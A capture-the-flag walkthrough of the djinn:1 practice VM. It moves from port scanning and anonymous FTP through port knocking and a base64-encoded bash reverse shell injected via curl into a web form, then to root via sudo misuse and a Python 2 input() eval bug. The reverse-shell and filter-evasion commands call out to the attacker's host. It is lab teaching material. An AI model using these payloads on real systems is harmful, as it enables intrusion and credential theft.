- djinn:1 is the next machine I want to break into.
- Level: Beginner-Intermediate
- flags: user.txt and root.txt
- Format: Virtual Machine (Virtualbox - OVA)
- Operating System: Linux
The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You’ll see the IP right on the login screen. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively.
Recon
Djinn shows its actual IP address on the login prompt, so there is no need to run nmap -sn or netdiscover.
nmap -A 192.168.14.106
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-30 15:32 EST
Nmap scan report for 192.168.14.106
Host is up (0.00078s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 23:54 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 00:23 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 00:23 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.14.107
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
MAC Address: 08:00:27:53:CE:19 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.78 ms 192.168.14.106
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.51 seconds
FTP Anonymous login allowed
SSH is filtered
Not a lot, so let’s try all ports.
root@kali:~# nmap -A -p- 192.168.14.106
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-30 15:43 EST
Nmap scan report for 192.168.14.106
Host is up (0.00066s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 23:54 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 00:23 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 00:23 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.14.107
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
1337/tcp open waste?
| fingerprint-strings:
| NULL:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
| '-', 8)
| RPCCheck:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
|_ '*', 6)
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.80%I=7%D=12/30%Time=5E0A619F%P=x86_64-pc-linux-gnu%r(N
SF:ULL,1BC,"\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__
SF:\x20_\x20_\x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x2
SF:0__\x20___\x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_
SF:\x20`\x20_\x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\
SF:x20`\x20_\x20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|
SF:\x20\|\x20\|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20
SF:\|\x20\|\x20\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|
SF:\x20\|_\|\\___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\n\nLet's\x20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20math
SF:s\nAnswer\x20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x2
SF:0you\x20your\x20gift\.\n\(3,\x20'-',\x208\)\n>\x20")%r(RPCCheck,1BC,"\x
SF:20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\x20_\x20_\
SF:x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20__\x20___\
SF:x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\x20`\x20_\
SF:x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x
SF:20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\x20\|\x20\
SF:|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\|\x20\|\x2
SF:0\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\x20\|_\|\\
SF:___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\nLet's\x
SF:20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths\nAnswer\x
SF:20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20you\x20you
SF:r\x20gift\.\n\(7,\x20'\*',\x206\)\n>\x20");
MAC Address: 08:00:27:53:CE:19 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.66 ms 192.168.14.106
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 102.76 seconds
That looks more interesting. So let’s start from the top.
FTP
ftp 192.168.14.106
Connected to 192.168.14.106.
220 (vsFTPd 3.0.3)
Name (192.168.14.106:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 11 Oct 20 23:54 creds.txt
-rw-r--r-- 1 0 0 128 Oct 21 00:23 game.txt
-rw-r--r-- 1 0 0 113 Oct 21 00:23 message.txt
226 Directory send OK.
ftp> get creds.txt
local: creds.txt remote: creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for creds.txt (11 bytes).
226 Transfer complete.
11 bytes received in 0.02 secs (0.6338 kB/s)
ftp> get game.txt
local: game.txt remote: game.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.txt (128 bytes).
226 Transfer complete.
128 bytes received in 0.02 secs (7.6252 kB/s)
ftp> get message.txt
local: message.txt remote: message.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for message.txt (113 bytes).
226 Transfer complete.
113 bytes received in 0.02 secs (7.1573 kB/s)
Connect as user anonymous, no password.
Files content
I replaced cat with bat. I like its output, so I created an alias in .bashrc:
alias cat='bat'
root@kali:~/djinn# cat creds.txt
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────
│ File: creds.txt
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────
1 │ nitu:81299
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────
root@kali:~/djinn# cat game.txt
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────
│ File: game.txt
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────
1 │ oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
2 │ final level and get the prize.
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────
root@kali:~/djinn# cat message.txt
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────
│ File: message.txt
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────
1 │ @nitish81299 I am going on holidays for few days, please take care of all the work.
2 │ And don't mess up anything.
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────
Port 1337
Opening with netcat:
nc 192.168.14.106 1337
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|
Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(3, '*', 1)
>
So we get a math equation to solve here and the message says we need to solve 1000 of them.
Solve with pwntools
A good way to solve such network games is Python with pwntools.
Install pwntools with Python 3 (I use Kali Linux 2019.4). Installing pwntools directly with pip3 ran into an error; the master branch does not fully support Python 3, so install from the dev3 branch:
apt-get update
apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade git+https://github.com/Gallopsled/pwntools.git@dev3
Solution
mathsolve.py
#!/usr/bin/env python3
from pwn import *

c = remote('192.168.14.106', 1337)
# skip the banner up to the blank line before the first question
c.recvuntil("\n\n", drop=True)
# the run below shows answers 0..1000, i.e. 1001 questions
for i in range(1001):
    # left operand: from "(" to ","
    c.recvuntil("(", drop=True)
    int1 = c.recvuntil(",", drop=True)
    # operator: between the single quotes
    c.recvuntil("'", drop=True)
    mathsym = c.recvuntil("'", drop=True)
    # right operand: from ", " to ")"
    c.recvuntil(", ", drop=True)
    int2 = c.recvuntil(")", drop=True)
    # rebuild the expression as bytes, e.g. b'3*1'; the game accepts the
    # expression itself as the answer (see the run below)
    equation = int1 + mathsym + int2
    print(str(i) + "th answer= " + str(equation))
    # send it after the "> " prompt
    c.sendlineafter('>', equation)
c.interactive()
➜ chmod +x mathsolve.py
➜ ./mathsolve.py
...
999th answer= b'1+6'
1000th answer= b'6*8'
[*] Switching to interactive mode
Here is your gift, I hope you know what to do with it:
1356, 6784, 3409
[*] Got EOF while reading in interactive
Looks like a port knocking sequence.
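The script above echoes the expression back and lets the game evaluate it. As an added example (not the original script), the variant below parses each "(a, 'op', b)" question itself and sends the computed number, so it does not depend on the server evaluating input. The host, port, prompt "> " and the three operators are taken from the transcript above; the network loop only runs when the file is executed directly.

```python
#!/usr/bin/env python3
"""Local-evaluation solver for the port-1337 arithmetic game (added example)."""
import operator
import re
import socket

HOST, PORT = "192.168.14.106", 1337      # assumed from the transcript above

# Only the operators seen in the transcript; an unknown one raises KeyError
# rather than sending a wrong answer silently.
OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul}
QUESTION = re.compile(rb"\((-?\d+),\s*'([+\-*])',\s*(-?\d+)\)")


def parse_question(data: bytes):
    """Return (a, op, b) for the first question in data, or None if there is none."""
    m = QUESTION.search(data)
    if not m:
        return None
    return int(m.group(1)), m.group(2).decode(), int(m.group(3))


def answer(data: bytes) -> int:
    """Compute the numeric answer to the question contained in data."""
    q = parse_question(data)
    if q is None:
        raise ValueError("no question in %r" % data)
    a, op, b = q
    return OPS[op](a, b)


def play(host=HOST, port=PORT) -> bytes:
    """Answer questions until the server stops asking; return the trailing output (the gift)."""
    with socket.create_connection((host, port), timeout=10) as s:
        buf = b""
        while True:
            # read until a complete prompt "> " is buffered
            while b"> " not in buf:
                chunk = s.recv(4096)
                if not chunk:            # server closed: what is left is the gift
                    return buf
                buf += chunk
            question, _, buf = buf.partition(b"> ")
            if parse_question(question) is None:
                return question + buf    # no question before the prompt: game over
            s.sendall(str(answer(question)).encode() + b"\n")


if __name__ == "__main__":
    print(play().decode(errors="replace"))
```

The banner's ASCII art contains parentheses but no digits, so the regular expression skips it and only matches the real question; searching the whole buffered text rather than reading token by token also survives any extra text the game prints between rounds.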
SSH
Check the ssh port
➜ nmap -p22 192.168.14.106
PORT STATE SERVICE
22/tcp filtered ssh
MAC Address: 08:00:27:AD:EB:9A (Oracle VirtualBox virtual NIC)
Install knockd
➜ apt install knockd
Try to open the ssh port
➜ knock 192.168.14.106 1356 6784 3409
Check the ssh port again
➜ nmap -p22 192.168.14.106
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 08:00:27:AD:EB:9A (Oracle VirtualBox virtual NIC)
So the port is open. I tried to connect with the credentials found on the anonymous FTP share, but wasn’t successful. A lot of fun, but still not able to connect.
➜ hydra -C creds.txt -u 192.168.14.106 ssh
[DATA] max 1 task per 1 server, overall 1 task, 1 login try, ~1 try per task
[DATA] attacking ssh://192.168.14.106:22/
1 of 1 target completed, 0 valid passwords found
I tried several combinations with the user nitish mentioned in message.txt, and loaded a larger password wordlist, but wasn’t successful.
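For reference, the knock above done by hand in Python, as an added example (not the page's tooling). knockd only watches for connection attempts to the configured ports in the right order, so an unprivileged TCP connect to each port is enough even though those ports are closed or filtered. The host and the sequence are the ones from the gift above; the loopback listener helper exists only so the probe can be tested locally.

```python
#!/usr/bin/env python3
"""Minimal port-knocking client plus a before/after check of the target port (added example)."""
import socket
import time

HOST = "192.168.14.106"            # assumed from the transcript above
SEQUENCE = (1356, 6784, 3409)      # the gift from port 1337
TARGET = 22


def tcp_probe(host: str, port: int, timeout: float = 0.5) -> bool:
    """Attempt a TCP connect; True only if the port accepted the connection.
    Refused (closed) and timed out (filtered) both return False."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return True
        except OSError:               # ConnectionRefusedError and socket.timeout included
            return False


def knock(host: str, sequence, delay: float = 0.2) -> None:
    """Touch each port in order; whether the connect succeeds is irrelevant."""
    for port in sequence:
        tcp_probe(host, port)
        time.sleep(delay)             # keep the knocks ordered on the wire


def knock_and_check(host=HOST, sequence=SEQUENCE, target=TARGET):
    """Return (target open before knock, target open after knock)."""
    before = tcp_probe(host, target)
    knock(host, sequence)
    after = tcp_probe(host, target)
    return before, after


def local_listener():
    """Open a listening socket on a free loopback port (used to self-test the probe)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    before, after = knock_and_check()
    print(f"port {TARGET} on {HOST}: open before={before}, after={after}")
```

A short timeout per knock matters: knockd has a configurable window for the whole sequence, and a filtered port that silently drops the SYN would otherwise stall each knock for the OS default of a minute or more.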
Port 7331
Accessing http://192.168.14.106:7331 opens a web page. Let’s dig into that.
gobuster
➜ gobuster dir -w /usr/share/wordlists/dirbuster/directories.jbrofuzz -u http://192.168.14.106:7331
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.14.106:7331
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directories.jbrofuzz
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/12/31 08:18:56 Starting gobuster
===============================================================
[ERROR] 2019/12/31 08:18:56 [!] parse http://192.168.14.106:7331/%: invalid URL escape "%"
/?? (Status: 200)
/genie (Status: 200)
/wish (Status: 200)
===============================================================
2019/12/31 08:20:22 Finished
With /wish we can execute commands on the web server; the output is shown on the black background of the image on /genie.
To see it a little more easily, I copied the request as a cURL command from the browser devtools:
➜ curl -L 'http://192.168.14.106:7331/wish' \
-H 'User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
--compressed -H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Origin: http://192.168.14.106:7331' -H 'DNT: 1' -H 'Connection: keep-alive' \
-H 'Referer: http://192.168.14.106:7331/wish' -H 'Upgrade-Insecure-Requests: 1' \
-H 'Pragma: no-cache' -H 'Cache-Control: no-cache' \
--data "cmd=ls"
...
<p> app.py
app.pyc
static
templates
</p>
...
Testing with ls / and some other commands ends with:
<p> Wrong choice of words </p>
I tried several reverse shell commands here, but wasn’t successful. Raj Chandel’s blog gave me the idea to base64-encode the reverse shell.
Doing it on the command line, without the online encoder, is possible with curl and some command-line fu:
➜ curl 'http://192.168.14.106:7331/wish' \
-H 'User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
-H 'Accept-Language: en-US,en;q=0.7,de;q=0.3' --compressed \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Origin: http://192.168.14.106:7331' \
-H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://192.168.14.106:7331/wish' \
-H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' \
--data-urlencode \
"cmd=echo $(echo 'bash -i >& /dev/tcp/192.168.14.107/8080 0>&1' | base64) | base64 -d | bash"
- use --data-urlencode instead of --data
Raj takes the reverse shell command bash -i >& /dev/tcp/192.168.14.107/8080 0>&1 and encodes it through https://www.base64encode.org/ , but we can get the same result on the command line:
echo 'bash -i >& /dev/tcp/192.168.14.107/8080 0>&1' | base64
Now let’s put this together on the console. $() runs the command in parentheses first and substitutes its output, so
echo $(echo 'bash -i >& /dev/tcp/192.168.14.107/8080 0>&1' | base64) | base64 -d | bash
is the same as:
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0LjEwNy84MDgwIDA+JjEK | base64 -d | bash
but it is easier to change IP or port. Switching the curl option from --data to --data-urlencode converts the command into echo%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0LjEwNy84MDgwIDA%2BJjEK%20%7C%20base64%20-d%20%7C%20bash. Note the + characters of the base64 string become %2B: sent raw with --data, a form parser decodes + as a space and the base64 no longer decodes.
Before running our curl command, start the netcat listener:
nc -nlvp 8080
listening on [any] 8080 ...
When we now run the curl command, we get a shell in netcat.
Remote shell
nc -nlvp 8080
listening on [any] 8080 ...
connect to [192.168.14.107] from (UNKNOWN) [192.168.14.106] 44802
bash: cannot set terminal process group (740): Inappropriate ioctl for device
bash: no job control in this shell
www-data@djinn:/opt/80$
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@djinn:/opt/80$ ls
ls
app.py app.pyc static templates
www-data@djinn:/opt/80$ cat app.py | grep CREDS
cat app.py | grep CREDS
CREDS = "/home/nitish/.dev/creds.txt"
www-data@djinn:/opt/80$ cd /home/nitish/.dev
cd /home/nitish/.dev
www-data@djinn:/home/nitish/.dev$ ls
ls
creds.txt
www-data@djinn:/home/nitish/.dev$ cat creds.txt
cat creds.txt
nitish:p4ssw0rdStr3r0n9
Get the user.txt flag
www-data@djinn:/home/nitish/.dev$ su - nitish
su - nitish
Password: p4ssw0rdStr3r0n9
nitish@djinn:~$ ls
ls
user.txt
nitish@djinn:~$ cat user.txt
cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
nitish@djinn:~$ sudo -l
sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie
- First flag: user.txt
- nitish is allowed to run /usr/bin/genie as user sam with sudo, without a password
The shell is still not that good; we can ssh in as user nitish with the password above, which gives a more stable shell.
Get root flag
ls -al /usr/bin/genie
-rwsr-x--- 1 sam nitish 72000 Nov 11 19:09 genie
nitish@djinn:~$ genie -e id test
genie -e id test
uid=1001(nitish) gid=1001(nitish) groups=1001(nitish)
nitish@djinn:~$ sudo -u sam genie -e id test
sudo -u sam genie -e id test
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
Commands like ls /home/sam or bash ended with You are a noob hacker!!, same for everything with -p.
man genie
SYNOPSIS
genie [-h] [-g] [-p SHELL] [-e EXEC] wish
DESCRIPTION
genie would complete all your wishes, even the naughty ones.
We all dream of getting those crazy privelege escalations, this will
even help you acheive that.
OPTIONS
wish
This is the wish you want to make .
-g, --god
Sometime we all would like to make a wish to god, this option
let you make wish directly to God;
Though genie can't gurantee you that your wish will be heard by
God, he's a busy man you know;
-p, --shell
Well who doesn't love those. You can get shell. Ex: -p "/bin/sh"
-e, --exec
Execute command on someone else computer is just too damn fun,
but this comes with some restrictions.
-cmd
You know sometime all you new is a damn CMD, windows I love you.
SEE ALSO
mzfr.github.io
BUGS
There are shit loads of bug in this program, it's all about finding
First of all, you have to add a wish at the end of the command, but the wish mustn’t be wish, or you will get an answer like Pass your wish to GOD, he might be able to help you.
The -cmd option from the man page is the way in: sudo -u sam genie -cmd man drops into a shell as sam.
nitish@djinn:~$ sudo -u sam genie -cmd man
sudo -u sam genie -cmd man
my man!!
$ whoami
whoami
sam
We’re user sam now. Check sudoers:
$ sudo -l
sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago
Now we need to run /root/lago. We get four choices:
What do you want to do ?
1 - Be naughtys
2 - Guess the numbers
3 - Read some damn filess
4 - Works
Enter your choice:
I ran grep -ir naughtys .* as user sam and got .pyc as a hit. A .pyc file is compiled Python code, so maybe it tells us something about the lago command. Double-checking with strings .pyc shows lots of strings from /root/lago.
So start an HTTP server on the VM, download the file to Kali and decompile it:
On djinn vm
python3 -m http.server
On Kali
curl -O http://192.168.14.106:8000/.pyc
pip3 install uncompyle6
uncompyle6 .pyc
...
def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'
...
- if the input equals num, start a shell
sam@djinn:/home/sam$ sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
Choose a number between 1 to 100:
Enter your number: num
# whoami
root
# bash
root@djinn:/home/sam#
- lago is Python 2, where input() is eval(raw_input()) in the caller's scope: typing the variable name num makes the comparison num == num, so the check passes and we get a new shell as root
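The bug that gives root, side by side with a hardened version, as an added example that is not the decompiled lago code. Python 3 has no evaluating input(), so the vulnerable function emulates the Python 2 behaviour with an explicit eval over the caller's locals; builtins are stripped only so this demo cannot run anything (the real Python 2 input() keeps them, so __import__('os').system('/bin/sh') would work there just as well as num). No shell is spawned; the functions report whether the check would pass.

```python
#!/usr/bin/env python3
"""Python 2 input() == eval(raw_input()): the lago guessing game, vulnerable vs hardened (added example)."""
from random import randint


def vulnerable_guess(typed: str, num: int) -> bool:
    """What `s = input(...); if s == num:` does on Python 2: the typed text is
    evaluated with the function's own locals visible, so the string "num"
    evaluates to the secret itself and always compares equal."""
    s = eval(typed, {"__builtins__": {}}, {"num": num})   # emulates py2 input()
    return s == num


def safe_guess(typed: str, num: int) -> bool:
    """Hardened form: accept only an integer literal, never evaluate user text."""
    try:
        s = int(typed.strip())
    except ValueError:
        return False
    return s == num


def guessit(typed: str, check=safe_guess) -> bool:
    """The game's decision, with the check pluggable so both variants can be compared.
    randint(1, 101) mirrors the decompiled code (101 is inclusive, despite the prompt)."""
    num = randint(1, 101)
    return check(typed, num)


if __name__ == "__main__":
    print("vulnerable, typed 'num':", guessit("num", check=vulnerable_guess))
    print("hardened,   typed 'num':", guessit("num"))
```

On Python 3 the same bug is spelled eval(input()); the fix in both cases is the same: parse the expected type and never hand user text to the interpreter.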
root flag
cd /root
./proof.sh
_ _ _ _ _
/ \ _ __ ___ __ _ ___(_)_ __ __ _| | | |
/ _ \ | '_ ` _ \ / _` |_ / | '_ \ / _` | | | |
/ ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/ \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
|___/
djinn pwned...
__________________________________________________________________________
Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Tue Dec 31 23:18:56 IST 2019
Whoami: root
__________________________________________________________________________
By @0xmzfr
Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)
Links
Here you can find other walkthroughs for this VM (they describe other routes and details):